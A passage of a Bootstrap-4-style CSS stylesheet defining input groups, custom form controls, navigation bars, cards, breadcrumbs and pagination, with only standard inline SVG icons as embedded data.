.input-group > .custom-file:not(:last-child) .custom-file-label::after {
border-top-right-radius: 0;
border-bottom-right-radius: 0;
}
.input-group > .custom-file:not(:first-child) .custom-file-label {
border-top-left-radius: 0;
border-bottom-left-radius: 0;
}
.input-group-prepend,
.input-group-append {
display: -ms-flexbox;
display: flex;
}
.input-group-prepend .btn,
.input-group-append .btn {
position: relative;
z-index: 2;
}
.input-group-prepend .btn:focus,
.input-group-append .btn:focus {
z-index: 3;
}
.input-group-prepend .btn + .btn,
.input-group-prepend .btn + .input-group-text,
.input-group-prepend .input-group-text + .input-group-text,
.input-group-prepend .input-group-text + .btn,
.input-group-append .btn + .btn,
.input-group-append .btn + .input-group-text,
.input-group-append .input-group-text + .input-group-text,
.input-group-append .input-group-text + .btn {
margin-left: -1px;
}
.input-group-prepend {
margin-right: -1px;
}
.input-group-append {
margin-left: -1px;
}
.input-group-text {
display: -ms-flexbox;
display: flex;
-ms-flex-align: center;
align-items: center;
padding: 0.375rem 0.75rem;
margin-bottom: 0;
font-size: 1rem;
font-weight: 400;
line-height: 1.5;
color: #495057;
text-align: center;
white-space: nowrap;
background-color: #e9ecef;
border: 1px solid #ced4da;
border-radius: 0.25rem;
}
.input-group-text input[type="radio"],
.input-group-text input[type="checkbox"] {
margin-top: 0;
}
.input-group-lg > .form-control:not(textarea),
.input-group-lg > .custom-select {
height: calc(2.875rem + 2px);
}
.input-group-lg > .form-control,
.input-group-lg > .custom-select,
.input-group-lg > .input-group-prepend > .input-group-text,
.input-group-lg > .input-group-append > .input-group-text,
.input-group-lg > .input-group-prepend > .btn,
.input-group-lg > .input-group-append > .btn {
padding: 0.5rem 1rem;
font-size: 1.25rem;
line-height: 1.5;
border-radius: 0.3rem;
}
.input-group-sm > .form-control:not(textarea),
.input-group-sm > .custom-select {
height: calc(1.8125rem + 2px);
}
.input-group-sm > .form-control,
.input-group-sm > .custom-select,
.input-group-sm > .input-group-prepend > .input-group-text,
.input-group-sm > .input-group-append > .input-group-text,
.input-group-sm > .input-group-prepend > .btn,
.input-group-sm > .input-group-append > .btn {
padding: 0.25rem 0.5rem;
font-size: 0.875rem;
line-height: 1.5;
border-radius: 0.2rem;
}
.input-group-lg > .custom-select,
.input-group-sm > .custom-select {
padding-right: 1.75rem;
}
.input-group > .input-group-prepend > .btn,
.input-group > .input-group-prepend > .input-group-text,
.input-group > .input-group-append:not(:last-child) > .btn,
.input-group > .input-group-append:not(:last-child) > .input-group-text,
.input-group > .input-group-append:last-child > .btn:not(:last-child):not(.dropdown-toggle),
.input-group > .input-group-append:last-child > .input-group-text:not(:last-child) {
border-top-right-radius: 0;
border-bottom-right-radius: 0;
}
.input-group > .input-group-append > .btn,
.input-group > .input-group-append > .input-group-text,
.input-group > .input-group-prepend:not(:first-child) > .btn,
.input-group > .input-group-prepend:not(:first-child) > .input-group-text,
.input-group > .input-group-prepend:first-child > .btn:not(:first-child),
.input-group > .input-group-prepend:first-child > .input-group-text:not(:first-child) {
border-top-left-radius: 0;
border-bottom-left-radius: 0;
}
.custom-control {
position: relative;
display: block;
min-height: 1.5rem;
padding-left: 1.5rem;
}
.custom-control-inline {
display: -ms-inline-flexbox;
display: inline-flex;
margin-right: 1rem;
}
.custom-control-input {
position: absolute;
z-index: -1;
opacity: 0;
}
.custom-control-input:checked ~ .custom-control-label::before {
color: #ffffff;
border-color: #007bff;
background-color: #007bff;
box-shadow: none;
}
.custom-control-input:focus ~ .custom-control-label::before {
box-shadow: inset 0 0 0 rgba(0, 0, 0, 0), none;
}
.custom-control-input:focus:not(:checked) ~ .custom-control-label::before {
border-color: #80bdff;
}
.custom-control-input:not(:disabled):active ~ .custom-control-label::before {
color: #ffffff;
background-color: #b3d7ff;
border-color: #b3d7ff;
box-shadow: none;
}
.custom-control-input:disabled ~ .custom-control-label {
color: #6c757d;
}
.custom-control-input:disabled ~ .custom-control-label::before {
background-color: #e9ecef;
}
.custom-control-label {
position: relative;
margin-bottom: 0;
vertical-align: top;
}
.custom-control-label::before {
position: absolute;
top: 0.25rem;
left: -1.5rem;
display: block;
width: 1rem;
height: 1rem;
pointer-events: none;
content: "";
background-color: #dee2e6;
border: #adb5bd solid 1px;
box-shadow: inset 0 0.25rem 0.25rem rgba(0, 0, 0, 0.1);
}
.custom-control-label::after {
position: absolute;
top: 0.25rem;
left: -1.5rem;
display: block;
width: 1rem;
height: 1rem;
content: "";
background: no-repeat 50% / 50% 50%;
}
.custom-checkbox .custom-control-label::before {
border-radius: 0.25rem;
}
.custom-checkbox .custom-control-input:checked ~ .custom-control-label::after {
background-image: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3E%3Cpath fill='%23ffffff' d='M6.564.75l-3.59 3.612-1.538-1.55L0 4.26 2.974 7.25 8 2.193z'/%3E%3C/svg%3E");
}
.custom-checkbox .custom-control-input:indeterminate ~ .custom-control-label::before {
border-color: #007bff;
background-color: #007bff;
box-shadow: none;
}
.custom-checkbox .custom-control-input:indeterminate ~ .custom-control-label::after {
background-image: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 4 4'%3E%3Cpath stroke='%23ffffff' d='M0 2h4'/%3E%3C/svg%3E");
}
.custom-checkbox .custom-control-input:disabled:checked ~ .custom-control-label::before {
background-color: rgba(0, 123, 255, 0.5);
}
.custom-checkbox .custom-control-input:disabled:indeterminate ~ .custom-control-label::before {
background-color: rgba(0, 123, 255, 0.5);
}
.custom-radio .custom-control-label::before {
border-radius: 50%;
}
.custom-radio .custom-control-input:checked ~ .custom-control-label::after {
background-image: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='-4 -4 8 8'%3E%3Ccircle r='3' fill='%23ffffff'/%3E%3C/svg%3E");
}
.custom-radio .custom-control-input:disabled:checked ~ .custom-control-label::before {
background-color: rgba(0, 123, 255, 0.5);
}
.custom-switch {
padding-left: 2.25rem;
}
.custom-switch .custom-control-label::before {
left: -2.25rem;
width: 1.75rem;
pointer-events: all;
border-radius: 0.5rem;
}
.custom-switch .custom-control-label::after {
top: calc(0.25rem + 2px);
left: calc(-2.25rem + 2px);
width: calc(1rem - 4px);
height: calc(1rem - 4px);
background-color: #adb5bd;
border-radius: 0.5rem;
transition: background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out, -webkit-transform 0.15s ease-in-out;
transition: transform 0.15s ease-in-out, background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;
transition: transform 0.15s ease-in-out, background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out, -webkit-transform 0.15s ease-in-out;
}
@media (prefers-reduced-motion: reduce) {
.custom-switch .custom-control-label::after {
transition: none;
}
}
.custom-switch .custom-control-input:checked ~ .custom-control-label::after {
background-color: #dee2e6;
-webkit-transform: translateX(0.75rem);
transform: translateX(0.75rem);
}
.custom-switch .custom-control-input:disabled:checked ~ .custom-control-label::before {
background-color: rgba(0, 123, 255, 0.5);
}
.custom-select {
display: inline-block;
width: 100%;
height: calc(2.25rem + 2px);
padding: 0.375rem 1.75rem 0.375rem 0.75rem;
font-size: 1rem;
font-weight: 400;
line-height: 1.5;
color: #495057;
vertical-align: middle;
background: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 4 5'%3E%3Cpath fill='%23343a40' d='M2 0L0 2h4zm0 5L0 3h4z'/%3E%3C/svg%3E") no-repeat right 0.75rem center/8px 10px;
background-color: #ffffff;
border: 1px solid #ced4da;
border-radius: 0.25rem;
box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.075);
-webkit-appearance: none;
-moz-appearance: none;
appearance: none;
}
.custom-select:focus {
border-color: #80bdff;
outline: 0;
box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.075), none;
}
.custom-select:focus::-ms-value {
color: #495057;
background-color: #ffffff;
}
.custom-select[multiple], .custom-select[size]:not([size="1"]) {
height: auto;
padding-right: 0.75rem;
background-image: none;
}
.custom-select:disabled {
color: #6c757d;
background-color: #e9ecef;
}
.custom-select::-ms-expand {
display: none;
}
.custom-select-sm {
height: calc(1.8125rem + 2px);
padding-top: 0.25rem;
padding-bottom: 0.25rem;
padding-left: 0.5rem;
font-size: 75%;
}
.custom-select-lg {
height: calc(2.875rem + 2px);
padding-top: 0.5rem;
padding-bottom: 0.5rem;
padding-left: 1rem;
font-size: 125%;
}
.custom-file {
position: relative;
display: inline-block;
width: 100%;
height: calc(2.25rem + 2px);
margin-bottom: 0;
}
.custom-file-input {
position: relative;
z-index: 2;
width: 100%;
height: calc(2.25rem + 2px);
margin: 0;
opacity: 0;
}
.custom-file-input:focus ~ .custom-file-label {
border-color: #80bdff;
box-shadow: none;
}
.custom-file-input:disabled ~ .custom-file-label {
background-color: #e9ecef;
}
.custom-file-input:lang(en) ~ .custom-file-label::after {
content: "Browse";
}
.custom-file-input ~ .custom-file-label[data-browse]::after {
content: attr(data-browse);
}
.custom-file-label {
position: absolute;
top: 0;
right: 0;
left: 0;
z-index: 1;
height: calc(2.25rem + 2px);
padding: 0.375rem 0.75rem;
font-weight: 400;
line-height: 1.5;
color: #495057;
background-color: #ffffff;
border: 1px solid #ced4da;
border-radius: 0.25rem;
box-shadow: none;
}
.custom-file-label::after {
position: absolute;
top: 0;
right: 0;
bottom: 0;
z-index: 3;
display: block;
height: 2.25rem;
padding: 0.375rem 0.75rem;
line-height: 1.5;
color: #495057;
content: "Browse";
background-color: #e9ecef;
border-left: inherit;
border-radius: 0 0.25rem 0.25rem 0;
}
.custom-range {
width: 100%;
height: calc(1rem + 0);
padding: 0;
background-color: transparent;
-webkit-appearance: none;
-moz-appearance: none;
appearance: none;
}
.custom-range:focus {
outline: none;
}
.custom-range:focus::-webkit-slider-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 0.2rem rgba(0, 123, 255, 0.25);
}
.custom-range:focus::-moz-range-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 0.2rem rgba(0, 123, 255, 0.25);
}
.custom-range:focus::-ms-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 0.2rem rgba(0, 123, 255, 0.25);
}
.custom-range::-moz-focus-outer {
border: 0;
}
.custom-range::-webkit-slider-thumb {
width: 1rem;
height: 1rem;
margin-top: -0.25rem;
background-color: #007bff;
border: 0;
border-radius: 1rem;
box-shadow: 0 0.1rem 0.25rem rgba(0, 0, 0, 0.1);
-webkit-transition: background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;
transition: background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;
-webkit-appearance: none;
appearance: none;
}
@media (prefers-reduced-motion: reduce) {
.custom-range::-webkit-slider-thumb {
-webkit-transition: none;
transition: none;
}
}
.custom-range::-webkit-slider-thumb:active {
background-color: #b3d7ff;
}
.custom-range::-webkit-slider-runnable-track {
width: 100%;
height: 0.5rem;
color: transparent;
cursor: pointer;
background-color: #dee2e6;
border-color: transparent;
border-radius: 1rem;
box-shadow: inset 0 0.25rem 0.25rem rgba(0, 0, 0, 0.1);
}
.custom-range::-moz-range-thumb {
width: 1rem;
height: 1rem;
background-color: #007bff;
border: 0;
border-radius: 1rem;
box-shadow: 0 0.1rem 0.25rem rgba(0, 0, 0, 0.1);
-moz-transition: background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;
transition: background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;
-moz-appearance: none;
appearance: none;
}
@media (prefers-reduced-motion: reduce) {
.custom-range::-moz-range-thumb {
-moz-transition: none;
transition: none;
}
}
.custom-range::-moz-range-thumb:active {
background-color: #b3d7ff;
}
.custom-range::-moz-range-track {
width: 100%;
height: 0.5rem;
color: transparent;
cursor: pointer;
background-color: #dee2e6;
border-color: transparent;
border-radius: 1rem;
box-shadow: inset 0 0.25rem 0.25rem rgba(0, 0, 0, 0.1);
}
.custom-range::-ms-thumb {
width: 1rem;
height: 1rem;
margin-top: 0;
margin-right: 0;
margin-left: 0;
background-color: #007bff;
border: 0;
border-radius: 1rem;
box-shadow: 0 0.1rem 0.25rem rgba(0, 0, 0, 0.1);
-ms-transition: background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;
transition: background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;
appearance: none;
}
@media (prefers-reduced-motion: reduce) {
.custom-range::-ms-thumb {
-ms-transition: none;
transition: none;
}
}
.custom-range::-ms-thumb:active {
background-color: #b3d7ff;
}
.custom-range::-ms-track {
width: 100%;
height: 0.5rem;
color: transparent;
cursor: pointer;
background-color: transparent;
border-color: transparent;
border-width: 0.5rem;
box-shadow: inset 0 0.25rem 0.25rem rgba(0, 0, 0, 0.1);
}
.custom-range::-ms-fill-lower {
background-color: #dee2e6;
border-radius: 1rem;
}
.custom-range::-ms-fill-upper {
margin-right: 15px;
background-color: #dee2e6;
border-radius: 1rem;
}
.custom-range:disabled::-webkit-slider-thumb {
background-color: #adb5bd;
}
.custom-range:disabled::-webkit-slider-runnable-track {
cursor: default;
}
.custom-range:disabled::-moz-range-thumb {
background-color: #adb5bd;
}
.custom-range:disabled::-moz-range-track {
cursor: default;
}
.custom-range:disabled::-ms-thumb {
background-color: #adb5bd;
}
.custom-control-label::before,
.custom-file-label,
.custom-select {
transition: background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;
}
@media (prefers-reduced-motion: reduce) {
.custom-control-label::before,
.custom-file-label,
.custom-select {
transition: none;
}
}
.nav {
display: -ms-flexbox;
display: flex;
-ms-flex-wrap: wrap;
flex-wrap: wrap;
padding-left: 0;
margin-bottom: 0;
list-style: none;
}
.nav-link {
display: block;
padding: 0.5rem 1rem;
}
.nav-link:hover, .nav-link:focus {
text-decoration: none;
}
.nav-link.disabled {
color: #6c757d;
pointer-events: none;
cursor: default;
}
.nav-tabs {
border-bottom: 1px solid #dee2e6;
}
.nav-tabs .nav-item {
margin-bottom: -1px;
}
.nav-tabs .nav-link {
border: 1px solid transparent;
border-top-left-radius: 0.25rem;
border-top-right-radius: 0.25rem;
}
.nav-tabs .nav-link:hover, .nav-tabs .nav-link:focus {
border-color: #e9ecef #e9ecef #dee2e6;
}
.nav-tabs .nav-link.disabled {
color: #6c757d;
background-color: transparent;
border-color: transparent;
}
.nav-tabs .nav-link.active,
.nav-tabs .nav-item.show .nav-link {
color: #495057;
background-color: #ffffff;
border-color: #dee2e6 #dee2e6 #ffffff;
}
.nav-tabs .dropdown-menu {
margin-top: -1px;
border-top-left-radius: 0;
border-top-right-radius: 0;
}
.nav-pills .nav-link {
border-radius: 0.25rem;
}
.nav-pills .nav-link.active,
.nav-pills .show > .nav-link {
color: #ffffff;
background-color: #007bff;
}
.nav-fill .nav-item {
-ms-flex: 1 1 auto;
flex: 1 1 auto;
text-align: center;
}
.nav-justified .nav-item {
-ms-flex-preferred-size: 0;
flex-basis: 0;
-ms-flex-positive: 1;
flex-grow: 1;
text-align: center;
}
.tab-content > .tab-pane {
display: none;
}
.tab-content > .active {
display: block;
}
.navbar {
position: relative;
display: -ms-flexbox;
display: flex;
-ms-flex-wrap: wrap;
flex-wrap: wrap;
-ms-flex-align: center;
align-items: center;
-ms-flex-pack: justify;
justify-content: space-between;
padding: 0.5rem 0.5rem;
}
.navbar > .container,
.navbar > .container-fluid {
display: -ms-flexbox;
display: flex;
-ms-flex-wrap: wrap;
flex-wrap: wrap;
-ms-flex-align: center;
align-items: center;
-ms-flex-pack: justify;
justify-content: space-between;
}
.navbar-brand {
display: inline-block;
padding-top: 0.3125rem;
padding-bottom: 0.3125rem;
margin-right: 0.5rem;
font-size: 1.25rem;
line-height: inherit;
white-space: nowrap;
}
.navbar-brand:hover, .navbar-brand:focus {
text-decoration: none;
}
.navbar-nav {
display: -ms-flexbox;
display: flex;
-ms-flex-direction: column;
flex-direction: column;
padding-left: 0;
margin-bottom: 0;
list-style: none;
}
.navbar-nav .nav-link {
padding-right: 0;
padding-left: 0;
}
.navbar-nav .dropdown-menu {
position: static;
float: none;
}
.navbar-text {
display: inline-block;
padding-top: 0.5rem;
padding-bottom: 0.5rem;
}
.navbar-collapse {
-ms-flex-preferred-size: 100%;
flex-basis: 100%;
-ms-flex-positive: 1;
flex-grow: 1;
-ms-flex-align: center;
align-items: center;
}
.navbar-toggler {
padding: 0.25rem 0.75rem;
font-size: 1.25rem;
line-height: 1;
background-color: transparent;
border: 1px solid transparent;
border-radius: 0.25rem;
}
.navbar-toggler:hover, .navbar-toggler:focus {
text-decoration: none;
}
.navbar-toggler-icon {
display: inline-block;
width: 1.5em;
height: 1.5em;
vertical-align: middle;
content: "";
background: no-repeat center center;
background-size: 100% 100%;
}
@media (max-width: 575.98px) {
.navbar-expand-sm > .container,
.navbar-expand-sm > .container-fluid {
padding-right: 0;
padding-left: 0;
}
}
@media (min-width: 576px) {
.navbar-expand-sm {
-ms-flex-flow: row nowrap;
flex-flow: row nowrap;
-ms-flex-pack: start;
justify-content: flex-start;
}
.navbar-expand-sm .navbar-nav {
-ms-flex-direction: row;
flex-direction: row;
}
.navbar-expand-sm .navbar-nav .dropdown-menu {
position: absolute;
}
.navbar-expand-sm .navbar-nav .nav-link {
padding-right: 1rem;
padding-left: 1rem;
}
.navbar-expand-sm > .container,
.navbar-expand-sm > .container-fluid {
-ms-flex-wrap: nowrap;
flex-wrap: nowrap;
}
.navbar-expand-sm .navbar-collapse {
display: -ms-flexbox !important;
display: flex !important;
-ms-flex-preferred-size: auto;
flex-basis: auto;
}
.navbar-expand-sm .navbar-toggler {
display: none;
}
}
@media (max-width: 767.98px) {
.navbar-expand-md > .container,
.navbar-expand-md > .container-fluid {
padding-right: 0;
padding-left: 0;
}
}
@media (min-width: 768px) {
.navbar-expand-md {
-ms-flex-flow: row nowrap;
flex-flow: row nowrap;
-ms-flex-pack: start;
justify-content: flex-start;
}
.navbar-expand-md .navbar-nav {
-ms-flex-direction: row;
flex-direction: row;
}
.navbar-expand-md .navbar-nav .dropdown-menu {
position: absolute;
}
.navbar-expand-md .navbar-nav .nav-link {
padding-right: 1rem;
padding-left: 1rem;
}
.navbar-expand-md > .container,
.navbar-expand-md > .container-fluid {
-ms-flex-wrap: nowrap;
flex-wrap: nowrap;
}
.navbar-expand-md .navbar-collapse {
display: -ms-flexbox !important;
display: flex !important;
-ms-flex-preferred-size: auto;
flex-basis: auto;
}
.navbar-expand-md .navbar-toggler {
display: none;
}
}
@media (max-width: 991.98px) {
.navbar-expand-lg > .container,
.navbar-expand-lg > .container-fluid {
padding-right: 0;
padding-left: 0;
}
}
@media (min-width: 992px) {
.navbar-expand-lg {
-ms-flex-flow: row nowrap;
flex-flow: row nowrap;
-ms-flex-pack: start;
justify-content: flex-start;
}
.navbar-expand-lg .navbar-nav {
-ms-flex-direction: row;
flex-direction: row;
}
.navbar-expand-lg .navbar-nav .dropdown-menu {
position: absolute;
}
.navbar-expand-lg .navbar-nav .nav-link {
padding-right: 1rem;
padding-left: 1rem;
}
.navbar-expand-lg > .container,
.navbar-expand-lg > .container-fluid {
-ms-flex-wrap: nowrap;
flex-wrap: nowrap;
}
.navbar-expand-lg .navbar-collapse {
display: -ms-flexbox !important;
display: flex !important;
-ms-flex-preferred-size: auto;
flex-basis: auto;
}
.navbar-expand-lg .navbar-toggler {
display: none;
}
}
@media (max-width: 1199.98px) {
.navbar-expand-xl > .container,
.navbar-expand-xl > .container-fluid {
padding-right: 0;
padding-left: 0;
}
}
@media (min-width: 1200px) {
.navbar-expand-xl {
-ms-flex-flow: row nowrap;
flex-flow: row nowrap;
-ms-flex-pack: start;
justify-content: flex-start;
}
.navbar-expand-xl .navbar-nav {
-ms-flex-direction: row;
flex-direction: row;
}
.navbar-expand-xl .navbar-nav .dropdown-menu {
position: absolute;
}
.navbar-expand-xl .navbar-nav .nav-link {
padding-right: 1rem;
padding-left: 1rem;
}
.navbar-expand-xl > .container,
.navbar-expand-xl > .container-fluid {
-ms-flex-wrap: nowrap;
flex-wrap: nowrap;
}
.navbar-expand-xl .navbar-collapse {
display: -ms-flexbox !important;
display: flex !important;
-ms-flex-preferred-size: auto;
flex-basis: auto;
}
.navbar-expand-xl .navbar-toggler {
display: none;
}
}
.navbar-expand {
-ms-flex-flow: row nowrap;
flex-flow: row nowrap;
-ms-flex-pack: start;
justify-content: flex-start;
}
.navbar-expand > .container,
.navbar-expand > .container-fluid {
padding-right: 0;
padding-left: 0;
}
.navbar-expand .navbar-nav {
-ms-flex-direction: row;
flex-direction: row;
}
.navbar-expand .navbar-nav .dropdown-menu {
position: absolute;
}
.navbar-expand .navbar-nav .nav-link {
padding-right: 1rem;
padding-left: 1rem;
}
.navbar-expand > .container,
.navbar-expand > .container-fluid {
-ms-flex-wrap: nowrap;
flex-wrap: nowrap;
}
.navbar-expand .navbar-collapse {
display: -ms-flexbox !important;
display: flex !important;
-ms-flex-preferred-size: auto;
flex-basis: auto;
}
.navbar-expand .navbar-toggler {
display: none;
}
.navbar-light .navbar-brand {
color: rgba(0, 0, 0, 0.9);
}
.navbar-light .navbar-brand:hover, .navbar-light .navbar-brand:focus {
color: rgba(0, 0, 0, 0.9);
}
.navbar-light .navbar-nav .nav-link {
color: rgba(0, 0, 0, 0.5);
}
.navbar-light .navbar-nav .nav-link:hover, .navbar-light .navbar-nav .nav-link:focus {
color: rgba(0, 0, 0, 0.7);
}
.navbar-light .navbar-nav .nav-link.disabled {
color: rgba(0, 0, 0, 0.3);
}
.navbar-light .navbar-nav .show > .nav-link,
.navbar-light .navbar-nav .active > .nav-link,
.navbar-light .navbar-nav .nav-link.show,
.navbar-light .navbar-nav .nav-link.active {
color: rgba(0, 0, 0, 0.9);
}
.navbar-light .navbar-toggler {
color: rgba(0, 0, 0, 0.5);
border-color: rgba(0, 0, 0, 0.1);
}
.navbar-light .navbar-toggler-icon {
background-image: url("data:image/svg+xml;charset=utf8,%3Csvg viewBox='0 0 30 30' xmlns='http://www.w3.org/2000/svg'%3E%3Cpath stroke='rgba(0, 0, 0, 0.5)' stroke-width='2' stroke-linecap='round' stroke-miterlimit='10' d='M4 7h22M4 15h22M4 23h22'/%3E%3C/svg%3E");
}
.navbar-light .navbar-text {
color: rgba(0, 0, 0, 0.5);
}
.navbar-light .navbar-text a {
color: rgba(0, 0, 0, 0.9);
}
.navbar-light .navbar-text a:hover, .navbar-light .navbar-text a:focus {
color: rgba(0, 0, 0, 0.9);
}
.navbar-dark .navbar-brand {
color: #ffffff;
}
.navbar-dark .navbar-brand:hover, .navbar-dark .navbar-brand:focus {
color: #ffffff;
}
.navbar-dark .navbar-nav .nav-link {
color: rgba(255, 255, 255, 0.75);
}
.navbar-dark .navbar-nav .nav-link:hover, .navbar-dark .navbar-nav .nav-link:focus {
color: white;
}
.navbar-dark .navbar-nav .nav-link.disabled {
color: rgba(255, 255, 255, 0.25);
}
.navbar-dark .navbar-nav .show > .nav-link,
.navbar-dark .navbar-nav .active > .nav-link,
.navbar-dark .navbar-nav .nav-link.show,
.navbar-dark .navbar-nav .nav-link.active {
color: #ffffff;
}
.navbar-dark .navbar-toggler {
color: rgba(255, 255, 255, 0.75);
border-color: rgba(255, 255, 255, 0.1);
}
.navbar-dark .navbar-toggler-icon {
background-image: url("data:image/svg+xml;charset=utf8,%3Csvg viewBox='0 0 30 30' xmlns='http://www.w3.org/2000/svg'%3E%3Cpath stroke='rgba(255, 255, 255, 0.75)' stroke-width='2' stroke-linecap='round' stroke-miterlimit='10' d='M4 7h22M4 15h22M4 23h22'/%3E%3C/svg%3E");
}
.navbar-dark .navbar-text {
color: rgba(255, 255, 255, 0.75);
}
.navbar-dark .navbar-text a {
color: #ffffff;
}
.navbar-dark .navbar-text a:hover, .navbar-dark .navbar-text a:focus {
color: #ffffff;
}
.card {
position: relative;
display: -ms-flexbox;
display: flex;
-ms-flex-direction: column;
flex-direction: column;
min-width: 0;
word-wrap: break-word;
background-color: #ffffff;
background-clip: border-box;
border: 0 solid rgba(0, 0, 0, 0.125);
border-radius: 0.25rem;
}
.card > hr {
margin-right: 0;
margin-left: 0;
}
.card > .list-group:first-child .list-group-item:first-child {
border-top-left-radius: 0.25rem;
border-top-right-radius: 0.25rem;
}
.card > .list-group:last-child .list-group-item:last-child {
border-bottom-right-radius: 0.25rem;
border-bottom-left-radius: 0.25rem;
}
.card-body {
-ms-flex: 1 1 auto;
flex: 1 1 auto;
padding: 1.25rem;
}
.card-title {
margin-bottom: 0.75rem;
}
.card-subtitle {
margin-top: -0.375rem;
margin-bottom: 0;
}
.card-text:last-child {
margin-bottom: 0;
}
.card-link:hover {
text-decoration: none;
}
.card-link + .card-link {
margin-left: 1.25rem;
}
.card-header {
padding: 0.75rem 1.25rem;
margin-bottom: 0;
background-color: rgba(0, 0, 0, 0.03);
border-bottom: 0 solid rgba(0, 0, 0, 0.125);
}
.card-header:first-child {
border-radius: calc(0.25rem - 0) calc(0.25rem - 0) 0 0;
}
.card-header + .list-group .list-group-item:first-child {
border-top: 0;
}
.card-footer {
padding: 0.75rem 1.25rem;
background-color: rgba(0, 0, 0, 0.03);
border-top: 0 solid rgba(0, 0, 0, 0.125);
}
.card-footer:last-child {
border-radius: 0 0 calc(0.25rem - 0) calc(0.25rem - 0);
}
.card-header-tabs {
margin-right: -0.625rem;
margin-bottom: -0.75rem;
margin-left: -0.625rem;
border-bottom: 0;
}
.card-header-pills {
margin-right: -0.625rem;
margin-left: -0.625rem;
}
.card-img-overlay {
position: absolute;
top: 0;
right: 0;
bottom: 0;
left: 0;
padding: 1.25rem;
}
.card-img {
width: 100%;
border-radius: calc(0.25rem - 0);
}
.card-img-top {
width: 100%;
border-top-left-radius: calc(0.25rem - 0);
border-top-right-radius: calc(0.25rem - 0);
}
.card-img-bottom {
width: 100%;
border-bottom-right-radius: calc(0.25rem - 0);
border-bottom-left-radius: calc(0.25rem - 0);
}
.card-deck {
display: -ms-flexbox;
display: flex;
-ms-flex-direction: column;
flex-direction: column;
}
.card-deck .card {
margin-bottom: 7.5px;
}
@media (min-width: 576px) {
.card-deck {
-ms-flex-flow: row wrap;
flex-flow: row wrap;
margin-right: -7.5px;
margin-left: -7.5px;
}
.card-deck .card {
display: -ms-flexbox;
display: flex;
-ms-flex: 1 0 0%;
flex: 1 0 0%;
-ms-flex-direction: column;
flex-direction: column;
margin-right: 7.5px;
margin-bottom: 0;
margin-left: 7.5px;
}
}
.card-group {
display: -ms-flexbox;
display: flex;
-ms-flex-direction: column;
flex-direction: column;
}
.card-group > .card {
margin-bottom: 7.5px;
}
@media (min-width: 576px) {
.card-group {
-ms-flex-flow: row wrap;
flex-flow: row wrap;
}
.card-group > .card {
-ms-flex: 1 0 0%;
flex: 1 0 0%;
margin-bottom: 0;
}
.card-group > .card + .card {
margin-left: 0;
border-left: 0;
}
.card-group > .card:not(:last-child) {
border-top-right-radius: 0;
border-bottom-right-radius: 0;
}
.card-group > .card:not(:last-child) .card-img-top,
.card-group > .card:not(:last-child) .card-header {
border-top-right-radius: 0;
}
.card-group > .card:not(:last-child) .card-img-bottom,
.card-group > .card:not(:last-child) .card-footer {
border-bottom-right-radius: 0;
}
.card-group > .card:not(:first-child) {
border-top-left-radius: 0;
border-bottom-left-radius: 0;
}
.card-group > .card:not(:first-child) .card-img-top,
.card-group > .card:not(:first-child) .card-header {
border-top-left-radius: 0;
}
.card-group > .card:not(:first-child) .card-img-bottom,
.card-group > .card:not(:first-child) .card-footer {
border-bottom-left-radius: 0;
}
}
.card-columns .card {
margin-bottom: 0.75rem;
}
@media (min-width: 576px) {
.card-columns {
-webkit-column-count: 3;
-moz-column-count: 3;
column-count: 3;
-webkit-column-gap: 1.25rem;
-moz-column-gap: 1.25rem;
column-gap: 1.25rem;
orphans: 1;
widows: 1;
}
.card-columns .card {
display: inline-block;
width: 100%;
}
}
.accordion > .card {
overflow: hidden;
}
.accordion > .card:not(:first-of-type) .card-header:first-child {
border-radius: 0;
}
.accordion > .card:not(:first-of-type):not(:last-of-type) {
border-bottom: 0;
border-radius: 0;
}
.accordion > .card:first-of-type {
border-bottom: 0;
border-bottom-right-radius: 0;
border-bottom-left-radius: 0;
}
.accordion > .card:last-of-type {
border-top-left-radius: 0;
border-top-right-radius: 0;
}
.accordion > .card .card-header {
margin-bottom: 0;
}
.breadcrumb {
display: -ms-flexbox;
display: flex;
-ms-flex-wrap: wrap;
flex-wrap: wrap;
padding: 0.75rem 1rem;
margin-bottom: 1rem;
list-style: none;
background-color: #e9ecef;
border-radius: 0.25rem;
}
.breadcrumb-item + .breadcrumb-item {
padding-left: 0.5rem;
}
.breadcrumb-item + .breadcrumb-item::before {
display: inline-block;
padding-right: 0.5rem;
color: #6c757d;
content: "/";
}
.breadcrumb-item + .breadcrumb-item:hover::before {
text-decoration: underline;
}
.breadcrumb-item + .breadcrumb-item:hover::before {
text-decoration: none;
}
.breadcrumb-item.active {
color: #6c757d;
}
.pagination {
display: -ms-flexbox;
display: flex;
padding-left: 0;
list-style: none;
border-radius: 0.25rem;
}
.page-link {
position: relative;
display: block;
padding: 0.5rem 0.75rem;
margin-left: -1px;
line-height: 1.25;
color: #007bff;
background-color: #ffffff;
border: 1px solid #dee2e6;
}
.page-link:hover {
z-index: 2;
color: #0056b3;
text-decoration: none;
background-color: #e9ecef;
border-color: #dee2e6;
}
.page-link:focus {
z-index: 2;
outline: 0;
box-shadow: 0 0 0 0.2rem rgba(0, 123, 255, 0.25);
}
